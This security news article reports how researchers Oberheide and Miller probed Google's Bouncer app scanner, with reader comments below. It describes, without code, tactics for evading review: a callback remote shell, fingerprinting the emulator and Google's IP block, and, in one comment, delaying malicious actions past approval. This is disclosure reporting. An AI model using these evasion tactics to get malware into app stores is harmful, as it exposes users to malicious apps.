Google PlayGoogle’s Android platform has become the most popular mobile operating system both among consumers and malware writers, and the company earlier this year introduced the Bouncer system to look for malicious apps in the Google Play market. Bouncer, which checks for malicious apps and known malware, is a good first step, but as new work from researchers Jon Oberheide and Charlie Miller shows, it can be bypassed quite easily and in ways that will be difficult for Google to address in the long term.

Oberheide and Miller, both well-known for their work on mobile security, went into their research without much detailed knowledge of how the Bouncer system works. Google has said little publicly about its capabilities, preferring not to give attackers any insights into the system’s inner workings. So Oberheide and Miller looked at it as a challenge, an exercise to see how much they could deduce about Bouncer from the outside, and, as it turns out, the inside.

“The problem that Bouncer faces is very similar to the problems that normal antivirus analysts face. Malware will fingerprint the system it’s on to see whether it’s running in a virtualized environment or in an emulator,” Oberheide said. “Bouncer was designed by people I know really well, and I wanted to see ow they’d design a system. It was a total black-box approach for us, to see how much we could learn by submitting apps and poking around.”

Oberheide and Miller set up some fake Google accounts and began submitting apps to Google Play, the new name for what was originally called the Android Market. They wanted to get a sense of the kind of environment that Google uses to analyze apps, see what weak spots the system may have and then look for methods to use them to bypass Bouncer entirely. One of the apps that they submitted contained some functionality that called out to a server that the researchers controlled once it was in the Bouncer environment. The app gave them a remote shell on the system and the ability to issue commands and see what was happening as Bouncer was analyzing the app.

The researchers quickly noticed that their app was running inside an emulator. That gave them data they could use in future submissions to hide malicious functionality if an app discovers it’s running in such an environment.

“It’s pretty trivial for us to bypass now, but I’m sure Google will make changes,” said Oberheide, who will be presenting the findings, along with Miller, at Summercon, later this week. “It’ll never be perfect, but hopefully they’ll sweep up a lot of the crap malware with it. But malware authors share code widely and collaborate, so I wouldn’t be surprised if they have a library soon to help bypass Bouncer that you’ll see in a bunch of malicious apps.”

Oberheide produced a video that shows the fake app he and Miller developed calling back and responding to commands from inside the Bouncer environment. 

By looking at the traffic coming to the command-and-control server that they set up, the researchers were able to see that all of the requests were coming from one Google IP block, something that would be easily identified by an attacker. Google could change that IP block, Oberheide said, but then the company would need to get IP space from a variety of providers and send traffic through those IP blocks. 

Oberheide also said that he and Miller were caught a few times during their research.

“We were a little overzealous and didn’t take many precautions at the beginning,” Oberheide said. “We wanted to see what it took to get caught. Some of them were blatant, like capturing a lot of data and sending it back out. We saw some follow-up from them that looked to be manual. It came from a Google IP address, but not in the Bouncer block. We got caught when our app was calling back to a server I run, but we got stealthier after that.”

Another interesting thing that Oberheide and Miller noticed is that it’s possible to upload apps to the system and have them analyzed by Bouncer without a valid credit card or account. So malware authors could try various tactics in their apps and see whether they’re successful without needing to burn a stolen card. 

The researchers have talked with Google about the general outline of their findings and Oberheide said he expects the company to respond, but that the larger problem with Bouncer will be difficult to solve.

“These issues are non-trivial to fix. They can knock off a few of the easier ones, but it’s a long-term problem,” he said.

Categories: Mobile Security

Comments (8)

  1. Anonymous

    IOS is dying, the front runner to a niche is hardly ever the long distance runner.

  2. Anonymous

    Interesting that the Android analysis is dynamic – they are running the code.  I believe that nearly all, if not all, of the Apple validation is done through static analysis of the object code.  They are looking at what API functions are called and that is about it.  The allowed functionality is restricted enough that it is extraordinary difficult to get anything through that should not be there.

    I would think there would be good points to dynamic analysis, but the clear risk is that the application and make decisions on what to invoke and what not to.  This means path analysis will not get you 100% coverage no matter what you do.

    I’d say static analysis would be a clear winner as long as you can restrict things sufficiently.  For example, allowing code to be downloaded and executed in any manner is clearly a no-no.  I do not believe this is possible with iOS without playing all sorts of games, most of which stand out on static analysis and will just get the application banned.  I believe there was an exposure for this early on but it is gone now, or at least much tighter.  I don’t know enough about Android to be able to say how hard that might be there, but I understand existing malware has been doing that.

  3. Anonymous

    I don’t see how this circumvention effort is any more sophisticated than writing your code to delay any malicious operations for, say, 30 days after you submit it and it gets approval. If Google isn’t examining the code to see if it’s looking for a test account, then they probably wouldn’t notice a timebomb, either.

  4. Anonymous

    Downloading and running code is in the eye of the beholder.


    If my program is a “virtual machine” that does nothing but display letters and numbers, and it is “programmed” by reading input from a file, I think Apple would take it.  Especially if I called it a text-file reader, which, after all, is what most people would call it.


    On the other hand, if I called my program a “java bytecode dynamic analysis tool” instead of a “java virtual machine” like most people would call it, I hope Apple would see past my “point of view” that my program is “just” reading in a data file.


    Bottom line:  The distinction between code and data, between virtual machine and a non-VM, is one of human symantics, and many computer programs are both VM and non-VM and many files are both code and data depending entirely on the point of view of the person using the program.


Comments are closed.